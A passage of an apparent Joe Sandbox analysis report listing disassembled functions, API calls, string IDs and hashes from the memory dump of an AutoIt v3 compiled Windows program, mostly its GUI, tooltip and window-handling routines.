                                                                                                                                  • SetMenuItemInfoW.USER32(?,?,00000000,00000030), ref: 00F0B9B3
                                                                                                                                  • DrawMenuBar.USER32(?), ref: 00F0B9C2
                                                                                                                                  • SetWindowTextW.USER32(?,0000014E), ref: 00F0B9EA
                                                                                                                                  Strings
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 00000001.00000002.4539614460.0000000000EA1000.00000040.00000001.01000000.00000005.sdmp, Offset: 00EA0000, based on PE: true
                                                                                                                                  • Associated: 00000001.00000002.4539301317.0000000000EA0000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                  • Associated: 00000001.00000002.4539614460.0000000000F4E000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                  • Associated: 00000001.00000002.4539614460.0000000000F5A000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                  • Associated: 00000001.00000002.4539614460.0000000000F74000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                  • Associated: 00000001.00000002.4539614460.0000000000FFC000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                  • Associated: 00000001.00000002.4542232387.0000000001002000.00000080.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                  • Associated: 00000001.00000002.4542602347.0000000001003000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_1_2_ea0000_UNK_.jbxd
                                                                                                                                  Similarity
                                                                                                                                  • API ID: MessageSend$Menu$InfoItemTextWindow_memset$CharDrawInvalidateNextRect
                                                                                                                                  • String ID: 0
                                                                                                                                  • API String ID: 1073566785-4108050209
                                                                                                                                  • Opcode ID: 0f05ee5edc8bf25b8ea6c14d108192387accf547a689e6813a06c5a343342216
                                                                                                                                  • Instruction ID: 6afa90a4d56ff4c27e4edddd9270234c1eebcbfa41fdbb61f00b740b6fac0059
                                                                                                                                  • Opcode Fuzzy Hash: 0f05ee5edc8bf25b8ea6c14d108192387accf547a689e6813a06c5a343342216
                                                                                                                                  • Instruction Fuzzy Hash: FCE16F71900219ABDB219F54CC84EEE7BB8FF05720F14819AFA15AB2D1DB748A41FF60
                                                                                                                                  Function 00F0744C Relevance: 37.0, APIs: 18, Strings: 3, Instructions: 290windowCOMMON
                                                                                                                                  Download Yara Rule
                                                                                                                                  APIs
                                                                                                                                  • GetCursorPos.USER32(?), ref: 00F07587
                                                                                                                                  • GetDesktopWindow.USER32 ref: 00F0759C
                                                                                                                                  • GetWindowRect.USER32(00000000), ref: 00F075A3
                                                                                                                                  • GetWindowLongW.USER32(?,000000F0), ref: 00F07605
                                                                                                                                  • DestroyWindow.USER32(?), ref: 00F07631
                                                                                                                                  • CreateWindowExW.USER32(00000008,tooltips_class32,00000000,00000003,80000000,80000000,80000000,80000000,00000000,00000000,00000000,00000000), ref: 00F0765A
                                                                                                                                  • SendMessageW.USER32(00000000,00000432,00000000,00000030), ref: 00F07678
                                                                                                                                  • SendMessageW.USER32(?,00000439,00000000,00000030), ref: 00F0769E
                                                                                                                                  • SendMessageW.USER32(?,00000421,?,?), ref: 00F076B3
                                                                                                                                  • SendMessageW.USER32(?,0000041D,00000000,00000000), ref: 00F076C6
                                                                                                                                  • IsWindowVisible.USER32(?), ref: 00F076E6
                                                                                                                                  • SendMessageW.USER32(?,00000412,00000000,D8F0D8F0), ref: 00F07701
                                                                                                                                  • SendMessageW.USER32(?,00000411,00000001,00000030), ref: 00F07715
                                                                                                                                  • GetWindowRect.USER32(?,?), ref: 00F0772D
                                                                                                                                  • MonitorFromPoint.USER32(?,?,00000002), ref: 00F07753
                                                                                                                                  • GetMonitorInfoW.USER32 ref: 00F0776D
                                                                                                                                  • CopyRect.USER32(?,?), ref: 00F07784
                                                                                                                                  • SendMessageW.USER32(?,00000412,00000000), ref: 00F077EF
                                                                                                                                  Strings
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 00000001.00000002.4539614460.0000000000EA1000.00000040.00000001.01000000.00000005.sdmp, Offset: 00EA0000, based on PE: true
                                                                                                                                  • Associated: 00000001.00000002.4539301317.0000000000EA0000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                  • Associated: 00000001.00000002.4539614460.0000000000F4E000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                  • Associated: 00000001.00000002.4539614460.0000000000F5A000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                  • Associated: 00000001.00000002.4539614460.0000000000F74000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                  • Associated: 00000001.00000002.4539614460.0000000000FFC000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                  • Associated: 00000001.00000002.4542232387.0000000001002000.00000080.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                  • Associated: 00000001.00000002.4542602347.0000000001003000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_1_2_ea0000_UNK_.jbxd
                                                                                                                                  Similarity
                                                                                                                                  • API ID: MessageSendWindow$Rect$Monitor$CopyCreateCursorDesktopDestroyFromInfoLongPointVisible
                                                                                                                                  • String ID: ($0$tooltips_class32
                                                                                                                                  • API String ID: 698492251-4156429822
                                                                                                                                  • Opcode ID: 9b23fb063df23990f9a08aa67305d6a8d1d3e9b556be94b2dd2137745a45cb9c
                                                                                                                                  • Instruction ID: 64ba59caa808e0a3e2c5fb06b17fa0bd13806307f69ffe6ef123a110f91f0ec8
                                                                                                                                  • Opcode Fuzzy Hash: 9b23fb063df23990f9a08aa67305d6a8d1d3e9b556be94b2dd2137745a45cb9c
                                                                                                                                  • Instruction Fuzzy Hash: 41B1A071A08340AFDB14EF64C944B6ABBE5FF88310F00895DF599AB291DB71EC05EB91
                                                                                                                                  Function 00EBA756 Relevance: 33.5, APIs: 18, Strings: 1, Instructions: 285windowtimeCOMMON
                                                                                                                                  Download Yara Rule
                                                                                                                                  APIs
                                                                                                                                  • SystemParametersInfoW.USER32(00000030,00000000,000000FF,00000000), ref: 00EBA839
                                                                                                                                  • GetSystemMetrics.USER32(00000007), ref: 00EBA841
                                                                                                                                  • SystemParametersInfoW.USER32(00000030,00000000,000000FF,00000000), ref: 00EBA86C
                                                                                                                                  • GetSystemMetrics.USER32(00000008), ref: 00EBA874
                                                                                                                                  • GetSystemMetrics.USER32(00000004), ref: 00EBA899
                                                                                                                                  • SetRect.USER32(000000FF,00000000,00000000,000000FF,000000FF), ref: 00EBA8B6
                                                                                                                                  • AdjustWindowRectEx.USER32(000000FF,00000000,00000000,00000000), ref: 00EBA8C6
                                                                                                                                  • CreateWindowExW.USER32(00000000,AutoIt v3 GUI,?,00000000,?,000000FF,000000FF,000000FF,?,00000000,00000000), ref: 00EBA8F9
                                                                                                                                  • SetWindowLongW.USER32(00000000,000000EB,00000000), ref: 00EBA90D
                                                                                                                                  • GetClientRect.USER32(00000000,000000FF), ref: 00EBA92B
                                                                                                                                  • GetStockObject.GDI32(00000011), ref: 00EBA947
                                                                                                                                  • SendMessageW.USER32(00000000,00000030,00000000), ref: 00EBA952
                                                                                                                                    • Part of subcall function 00EBB736: GetCursorPos.USER32(000000FF), ref: 00EBB749
                                                                                                                                    • Part of subcall function 00EBB736: ScreenToClient.USER32(00000000,000000FF), ref: 00EBB766
                                                                                                                                    • Part of subcall function 00EBB736: GetAsyncKeyState.USER32(00000001), ref: 00EBB78B
                                                                                                                                    • Part of subcall function 00EBB736: GetAsyncKeyState.USER32(00000002), ref: 00EBB799
                                                                                                                                  • SetTimer.USER32(00000000,00000000,00000028,00EBACEE), ref: 00EBA979
                                                                                                                                  Strings
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 00000001.00000002.4539614460.0000000000EA1000.00000040.00000001.01000000.00000005.sdmp, Offset: 00EA0000, based on PE: true
                                                                                                                                  • Associated: 00000001.00000002.4539301317.0000000000EA0000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                  • Associated: 00000001.00000002.4539614460.0000000000F4E000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                  • Associated: 00000001.00000002.4539614460.0000000000F5A000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                  • Associated: 00000001.00000002.4539614460.0000000000F74000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                  • Associated: 00000001.00000002.4539614460.0000000000FFC000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                  • Associated: 00000001.00000002.4542232387.0000000001002000.00000080.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                  • Associated: 00000001.00000002.4542602347.0000000001003000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_1_2_ea0000_UNK_.jbxd
                                                                                                                                  Similarity
                                                                                                                                  • API ID: System$MetricsRectWindow$AsyncClientInfoParametersState$AdjustCreateCursorLongMessageObjectScreenSendStockTimer
                                                                                                                                  • String ID: AutoIt v3 GUI
                                                                                                                                  • API String ID: 1458621304-248962490
                                                                                                                                  • Opcode ID: 0226609958bb7b2778b48cab5687e8a615bb3311b23a4ca16ff091133168402d
                                                                                                                                  • Instruction ID: aae9ee20efc5128e4741dcb8a718b18b4771aa717ae59dcc6d9b2d3f1eee1cf7
                                                                                                                                  • Opcode Fuzzy Hash: 0226609958bb7b2778b48cab5687e8a615bb3311b23a4ca16ff091133168402d
                                                                                                                                  • Instruction Fuzzy Hash: E0B14871A0020AAFDB14DFA8DC45BEE7BB4FB48314F194229FA15A7290DB74E841EB51
                                                                                                                                  Function 00F069C5 Relevance: 26.5, APIs: 2, Strings: 13, Instructions: 281windowCOMMON
                                                                                                                                  Download Yara Rule
                                                                                                                                  APIs
                                                                                                                                  • CharUpperBuffW.USER32(?,?), ref: 00F06A52
                                                                                                                                  • SendMessageW.USER32(?,00001032,00000000,00000000), ref: 00F06B12
                                                                                                                                  Strings
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 00000001.00000002.4539614460.0000000000EA1000.00000040.00000001.01000000.00000005.sdmp, Offset: 00EA0000, based on PE: true
                                                                                                                                  • Associated: 00000001.00000002.4539301317.0000000000EA0000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                  • Associated: 00000001.00000002.4539614460.0000000000F4E000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                  • Associated: 00000001.00000002.4539614460.0000000000F5A000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                  • Associated: 00000001.00000002.4539614460.0000000000F74000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                  • Associated: 00000001.00000002.4539614460.0000000000FFC000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                  • Associated: 00000001.00000002.4542232387.0000000001002000.00000080.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                  • Associated: 00000001.00000002.4542602347.0000000001003000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_1_2_ea0000_UNK_.jbxd
                                                                                                                                  Similarity
                                                                                                                                  • API ID: BuffCharMessageSendUpper
                                                                                                                                  • String ID: DESELECT$FINDITEM$GETITEMCOUNT$GETSELECTED$GETSELECTEDCOUNT$GETSUBITEMCOUNT$GETTEXT$ISSELECTED$SELECT$SELECTALL$SELECTCLEAR$SELECTINVERT$VIEWCHANGE
                                                                                                                                  • API String ID: 3974292440-719923060
                                                                                                                                  • Opcode ID: ecf2eb678fe17d4b95fbfba3498eea8017973a48ca5341238afe141a23b08386
                                                                                                                                  • Instruction ID: d5aebd0045340a128c790407cbbba143f2e2442a98fa66ceabf59a954f9e6e12
                                                                                                                                  • Opcode Fuzzy Hash: ecf2eb678fe17d4b95fbfba3498eea8017973a48ca5341238afe141a23b08386
                                                                                                                                  • Instruction Fuzzy Hash: A5A182706042019BCB08EF14C951A6AB7E5FF89364F14982DF996AB3D2DB30EC19EB41
                                                                                                                                  Function 00EDE69D Relevance: 26.5, APIs: 13, Strings: 2, Instructions: 249COMMON
                                                                                                                                  Download Yara Rule
                                                                                                                                  APIs
                                                                                                                                  • GetClassNameW.USER32(00000008,?,00000400), ref: 00EDE6E1
                                                                                                                                  • _wcscmp.LIBCMT ref: 00EDE6F2
                                                                                                                                  • GetWindowTextW.USER32(00000001,?,00000400), ref: 00EDE71A
                                                                                                                                  • CharUpperBuffW.USER32(?,00000000), ref: 00EDE737
                                                                                                                                  • _wcscmp.LIBCMT ref: 00EDE755
                                                                                                                                  • _wcsstr.LIBCMT ref: 00EDE766
                                                                                                                                  • GetClassNameW.USER32(00000018,?,00000400), ref: 00EDE79E
                                                                                                                                  • _wcscmp.LIBCMT ref: 00EDE7AE
                                                                                                                                  • GetWindowTextW.USER32(00000002,?,00000400), ref: 00EDE7D5
                                                                                                                                  • GetClassNameW.USER32(00000018,?,00000400), ref: 00EDE81E
                                                                                                                                  • _wcscmp.LIBCMT ref: 00EDE82E
                                                                                                                                  • GetClassNameW.USER32(00000010,?,00000400), ref: 00EDE856
                                                                                                                                  • GetWindowRect.USER32(00000004,?), ref: 00EDE8BF
                                                                                                                                  Strings
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 00000001.00000002.4539614460.0000000000EA1000.00000040.00000001.01000000.00000005.sdmp, Offset: 00EA0000, based on PE: true
                                                                                                                                  • Associated: 00000001.00000002.4539301317.0000000000EA0000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                  • Associated: 00000001.00000002.4539614460.0000000000F4E000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                  • Associated: 00000001.00000002.4539614460.0000000000F5A000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                  • Associated: 00000001.00000002.4539614460.0000000000F74000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                  • Associated: 00000001.00000002.4539614460.0000000000FFC000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                  • Associated: 00000001.00000002.4542232387.0000000001002000.00000080.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                  • Associated: 00000001.00000002.4542602347.0000000001003000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_1_2_ea0000_UNK_.jbxd
                                                                                                                                  Similarity
                                                                                                                                  • API ID: ClassName_wcscmp$Window$Text$BuffCharRectUpper_wcsstr
                                                                                                                                  • String ID: @$ThumbnailClass
                                                                                                                                  • API String ID: 1788623398-1539354611
                                                                                                                                  • Opcode ID: 776fbe1378706a68203460f866e70055b99cb05aaee79d71c68e6ec3de7e4162
                                                                                                                                  • Instruction ID: 855b7eccb0974bcc615ac325d95d8949f62e91ff5bb5170851868c190844295f
                                                                                                                                  • Opcode Fuzzy Hash: 776fbe1378706a68203460f866e70055b99cb05aaee79d71c68e6ec3de7e4162
                                                                                                                                  • Instruction Fuzzy Hash: 3A8191310042499BDB15EF10C889FAA7BE8EF44718F14A46BFD85AE295DB30DD46CBA1
                                                                                                                                  Function 00EDE4EA Relevance: 26.4, APIs: 3, Strings: 12, Instructions: 104COMMON
                                                                                                                                  Download Yara Rule
                                                                                                                                  APIs
                                                                                                                                  Strings
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 00000001.00000002.4539614460.0000000000EA1000.00000040.00000001.01000000.00000005.sdmp, Offset: 00EA0000, based on PE: true
                                                                                                                                  • Associated: 00000001.00000002.4539301317.0000000000EA0000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                  • Associated: 00000001.00000002.4539614460.0000000000F4E000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                  • Associated: 00000001.00000002.4539614460.0000000000F5A000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                  • Associated: 00000001.00000002.4539614460.0000000000F74000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                  • Associated: 00000001.00000002.4539614460.0000000000FFC000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                  • Associated: 00000001.00000002.4542232387.0000000001002000.00000080.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                  • Associated: 00000001.00000002.4542602347.0000000001003000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_1_2_ea0000_UNK_.jbxd
                                                                                                                                  Similarity
                                                                                                                                  • API ID: __wcsnicmp
                                                                                                                                  • String ID: ACTIVE$ALL$CLASSNAME=$HANDLE=$LAST$REGEXP=$[ACTIVE$[ALL$[CLASS:$[HANDLE:$[LAST$[REGEXPTITLE:
                                                                                                                                  • API String ID: 1038674560-1810252412
                                                                                                                                  • Opcode ID: 49ca8e3f9bd3283324d600bb42d8fd65b0ffc41e23ad34c0ed36ac3a71a88ee6
                                                                                                                                  • Instruction ID: 2d3a4e66e4ab0ac0937ec1e7f3d9ec97d49c85d055c961d220f77cdef4db41eb
                                                                                                                                  • Opcode Fuzzy Hash: 49ca8e3f9bd3283324d600bb42d8fd65b0ffc41e23ad34c0ed36ac3a71a88ee6
                                                                                                                                  • Instruction Fuzzy Hash: 12310231904205A6CA18FB10DE17EEE73E4AF16B69F20211AFA51782D6FF51BF09C612
                                                                                                                                  Function 00EDF898 Relevance: 25.7, APIs: 17, Instructions: 168windowtimeCOMMON
                                                                                                                                  Download Yara Rule
                                                                                                                                  APIs
                                                                                                                                  • LoadIconW.USER32(00000063), ref: 00EDF8AB
                                                                                                                                  • SendMessageW.USER32(?,00000080,00000000,00000000), ref: 00EDF8BD
                                                                                                                                  • SetWindowTextW.USER32(?,?), ref: 00EDF8D4
                                                                                                                                  • GetDlgItem.USER32(?,000003EA), ref: 00EDF8E9
                                                                                                                                  • SetWindowTextW.USER32(00000000,?), ref: 00EDF8EF
                                                                                                                                  • GetDlgItem.USER32(?,000003E9), ref: 00EDF8FF
                                                                                                                                  • SetWindowTextW.USER32(00000000,?), ref: 00EDF905
                                                                                                                                  • SendDlgItemMessageW.USER32(?,000003E9,000000CC,?,00000000), ref: 00EDF926
                                                                                                                                  • SendDlgItemMessageW.USER32(?,000003E9,000000C5,00000000,00000000), ref: 00EDF940
                                                                                                                                  • GetWindowRect.USER32(?,?), ref: 00EDF949
                                                                                                                                  • SetWindowTextW.USER32(?,?), ref: 00EDF9B4
                                                                                                                                  • GetDesktopWindow.USER32 ref: 00EDF9BA
                                                                                                                                  • GetWindowRect.USER32(00000000), ref: 00EDF9C1
                                                                                                                                  • MoveWindow.USER32(?,?,?,?,00000000,00000000), ref: 00EDFA0D
                                                                                                                                  • GetClientRect.USER32(?,?), ref: 00EDFA1A
                                                                                                                                  • PostMessageW.USER32(?,00000005,00000000,00000000), ref: 00EDFA3F
                                                                                                                                  • SetTimer.USER32(?,0000040A,00000000,00000000), ref: 00EDFA6A
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 00000001.00000002.4539614460.0000000000EA1000.00000040.00000001.01000000.00000005.sdmp, Offset: 00EA0000, based on PE: true
                                                                                                                                  • Associated: 00000001.00000002.4539301317.0000000000EA0000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                  • Associated: 00000001.00000002.4539614460.0000000000F4E000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                  • Associated: 00000001.00000002.4539614460.0000000000F5A000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                  • Associated: 00000001.00000002.4539614460.0000000000F74000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                  • Associated: 00000001.00000002.4539614460.0000000000FFC000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                  • Associated: 00000001.00000002.4542232387.0000000001002000.00000080.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                  • Associated: 00000001.00000002.4542602347.0000000001003000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_1_2_ea0000_UNK_.jbxd
                                                                                                                                  Similarity
                                                                                                                                  • API ID: Window$ItemMessageText$RectSend$ClientDesktopIconLoadMovePostTimer
                                                                                                                                  • String ID:
                                                                                                                                  • API String ID: 3869813825-0
                                                                                                                                  • Opcode ID: f8f7dc84bd2dad55b7b567bc6b0f693c3ba3eccd505d6d900a5ca3c3d23cf3a3
                                                                                                                                  • Instruction ID: 075896aedba3df1792a37c90eb575b08b5142c2fcb7f9b0250a50608e22d834c
                                                                                                                                  • Opcode Fuzzy Hash: f8f7dc84bd2dad55b7b567bc6b0f693c3ba3eccd505d6d900a5ca3c3d23cf3a3
                                                                                                                                  • Instruction Fuzzy Hash: 81517D70900709AFDB20DFA8CD89F6EBBF5FF04709F104929E596A26A0C774A946DF50
                                                                                                                                  Function 00F0CC68 Relevance: 24.7, APIs: 12, Strings: 2, Instructions: 205windowCOMMON
                                                                                                                                  Download Yara Rule
                                                                                                                                  APIs
                                                                                                                                  • _memset.LIBCMT ref: 00F0CD0B
                                                                                                                                  • DestroyWindow.USER32(00000000,?), ref: 00F0CD83
                                                                                                                                    • Part of subcall function 00EA7E53: _memmove.LIBCMT ref: 00EA7EB9
                                                                                                                                  • CreateWindowExW.USER32(00000008,tooltips_class32,00000000,?,80000000,80000000,80000000,80000000,?,00000000,00000000,?), ref: 00F0CE04
                                                                                                                                  • SendMessageW.USER32(00000000,00000433,00000000,00000030), ref: 00F0CE26
                                                                                                                                  • SendMessageW.USER32(00000000,00000432,00000000,00000030), ref: 00F0CE35
                                                                                                                                  • DestroyWindow.USER32(?), ref: 00F0CE52
                                                                                                                                  • CreateWindowExW.USER32(00000008,tooltips_class32,00000000,?,80000000,80000000,80000000,80000000,?,00000000,00EA0000,00000000), ref: 00F0CE85
                                                                                                                                  • SendMessageW.USER32(00000000,00000432,00000000,00000030), ref: 00F0CEA4
                                                                                                                                  • GetDesktopWindow.USER32 ref: 00F0CEB9
                                                                                                                                  • GetWindowRect.USER32(00000000), ref: 00F0CEC0
                                                                                                                                  • SendMessageW.USER32(00000000,00000418,00000000,?), ref: 00F0CED2
                                                                                                                                  • SendMessageW.USER32(00000000,00000421,?,00000000), ref: 00F0CEEA
                                                                                                                                    • Part of subcall function 00EBB155: GetWindowLongW.USER32(?,000000EB), ref: 00EBB166
                                                                                                                                  Strings
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 00000001.00000002.4539614460.0000000000EA1000.00000040.00000001.01000000.00000005.sdmp, Offset: 00EA0000, based on PE: true
                                                                                                                                  • Associated: 00000001.00000002.4539301317.0000000000EA0000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                  • Associated: 00000001.00000002.4539614460.0000000000F4E000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                  • Associated: 00000001.00000002.4539614460.0000000000F5A000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                  • Associated: 00000001.00000002.4539614460.0000000000F74000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                  • Associated: 00000001.00000002.4539614460.0000000000FFC000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                  • Associated: 00000001.00000002.4542232387.0000000001002000.00000080.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                  • Associated: 00000001.00000002.4542602347.0000000001003000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_1_2_ea0000_UNK_.jbxd
                                                                                                                                  Similarity
                                                                                                                                  • API ID: Window$MessageSend$CreateDestroy$DesktopLongRect_memmove_memset
                                                                                                                                  • String ID: 0$tooltips_class32
                                                                                                                                  • API String ID: 1297703922-3619404913
                                                                                                                                  • Opcode ID: b8a47e6967cc146fbcab2d6f58a8f173bf989be48c47b4be182e98c087d4f4cb
                                                                                                                                  • Instruction ID: a44b9d55ad3d56f8434efc26e501bc109f15939150a9f4d5ca702a9986ddfad1
                                                                                                                                  • Opcode Fuzzy Hash: b8a47e6967cc146fbcab2d6f58a8f173bf989be48c47b4be182e98c087d4f4cb
                                                                                                                                  • Instruction Fuzzy Hash: 3B719B71640309AFE725CF28CC45FAA7BE9FB89714F58061CF985972A1D770E802EB91
                                                                                                                                  Function 00EEB428 Relevance: 23.1, APIs: 11, Strings: 2, Instructions: 350timeCOMMON
                                                                                                                                  Download Yara Rule
                                                                                                                                  APIs
                                                                                                                                  • VariantInit.OLEAUT32(00000000), ref: 00EEB46D
                                                                                                                                  • VariantCopy.OLEAUT32(?,?), ref: 00EEB476
                                                                                                                                  • VariantClear.OLEAUT32(?), ref: 00EEB482
                                                                                                                                  • VariantTimeToSystemTime.OLEAUT32(?,?,?), ref: 00EEB561
                                                                                                                                  • __swprintf.LIBCMT ref: 00EEB591
                                                                                                                                  • VarR8FromDec.OLEAUT32(?,?), ref: 00EEB5BD
                                                                                                                                  • VariantInit.OLEAUT32(?), ref: 00EEB63F
                                                                                                                                  • SysFreeString.OLEAUT32(00000016), ref: 00EEB6D1
                                                                                                                                  • VariantClear.OLEAUT32(?), ref: 00EEB727
                                                                                                                                  • VariantClear.OLEAUT32(?), ref: 00EEB736
                                                                                                                                  • VariantInit.OLEAUT32(00000000), ref: 00EEB772
                                                                                                                                  Strings
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 00000001.00000002.4539614460.0000000000EA1000.00000040.00000001.01000000.00000005.sdmp, Offset: 00EA0000, based on PE: true
                                                                                                                                  • Associated: 00000001.00000002.4539301317.0000000000EA0000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                  • Associated: 00000001.00000002.4539614460.0000000000F4E000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                  • Associated: 00000001.00000002.4539614460.0000000000F5A000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                  • Associated: 00000001.00000002.4539614460.0000000000F74000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                  • Associated: 00000001.00000002.4539614460.0000000000FFC000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                  • Associated: 00000001.00000002.4542232387.0000000001002000.00000080.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                  • Associated: 00000001.00000002.4542602347.0000000001003000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_1_2_ea0000_UNK_.jbxd
                                                                                                                                  Similarity
                                                                                                                                  • API ID: Variant$ClearInit$Time$CopyFreeFromStringSystem__swprintf
                                                                                                                                  • String ID: %4d%02d%02d%02d%02d%02d$Default
                                                                                                                                  • API String ID: 3730832054-3931177956
                                                                                                                                  • Opcode ID: e86efac128784a10c1d2bf0a38d785bcd993211fdfe5e97f3a8067446b87f796
                                                                                                                                  • Instruction ID: 40d20cc9f2576a0aa9667fa188f79544e32a80945ae2d4c4da89c5f07db7d4bf
                                                                                                                                  • Opcode Fuzzy Hash: e86efac128784a10c1d2bf0a38d785bcd993211fdfe5e97f3a8067446b87f796
                                                                                                                                  • Instruction Fuzzy Hash: B7C1F57190025ADBCB20DF6AD844BABB7F4FF45300F249465E425BB582EB70EC44DB91
                                                                                                                                  Function 00F06F67 Relevance: 23.0, APIs: 2, Strings: 11, Instructions: 244windowCOMMON
                                                                                                                                  Download Yara Rule
                                                                                                                                  APIs
                                                                                                                                  • CharUpperBuffW.USER32(?,?), ref: 00F06FF9
                                                                                                                                  • SendMessageW.USER32(?,00001105,00000000,00000000), ref: 00F07044
                                                                                                                                  Strings
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 00000001.00000002.4539614460.0000000000EA1000.00000040.00000001.01000000.00000005.sdmp, Offset: 00EA0000, based on PE: true
                                                                                                                                  • Associated: 00000001.00000002.4539301317.0000000000EA0000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                  • Associated: 00000001.00000002.4539614460.0000000000F4E000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                  • Associated: 00000001.00000002.4539614460.0000000000F5A000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                  • Associated: 00000001.00000002.4539614460.0000000000F74000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                  • Associated: 00000001.00000002.4539614460.0000000000FFC000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                  • Associated: 00000001.00000002.4542232387.0000000001002000.00000080.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                  • Associated: 00000001.00000002.4542602347.0000000001003000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_1_2_ea0000_UNK_.jbxd
                                                                                                                                  Similarity
                                                                                                                                  • API ID: BuffCharMessageSendUpper
                                                                                                                                  • String ID: CHECK$COLLAPSE$EXISTS$EXPAND$GETITEMCOUNT$GETSELECTED$GETTEXT$GETTOTALCOUNT$ISCHECKED$SELECT$UNCHECK
                                                                                                                                  • API String ID: 3974292440-4258414348
                                                                                                                                  • Opcode ID: 493909e01be090a389bccc7ae5108fbd6fca0374ee791d2ef0f51615d73d1ecf
                                                                                                                                  • Instruction ID: 58abe75ad7f17fb4191cf6884d9d99c819525de26968d19825d49675cd7cd300
                                                                                                                                  • Opcode Fuzzy Hash: 493909e01be090a389bccc7ae5108fbd6fca0374ee791d2ef0f51615d73d1ecf
